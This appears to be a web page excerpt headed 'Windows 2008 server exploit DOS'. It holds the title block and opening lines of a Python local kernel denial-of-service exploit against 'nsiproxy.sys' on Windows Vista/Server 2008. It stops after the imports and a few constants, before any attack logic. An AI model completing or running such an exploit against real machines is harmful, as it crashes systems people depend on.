Windows 2008 server exploit DOS
#!/usr/bin/python ############################################################################ ## ## Title: Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Exploit ## Author: Lufeng Li of Neusoft Corporation ## Vendor: www.microsoft.com ## Vulnerable: Windows Vista/Server 2008 ## ############################################################################ from ctypes import * kernel32 = windll.kernel32 Psapi = windll.Psapi if __name__ == ‘__main__’: GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 CREATE_ALWAYS …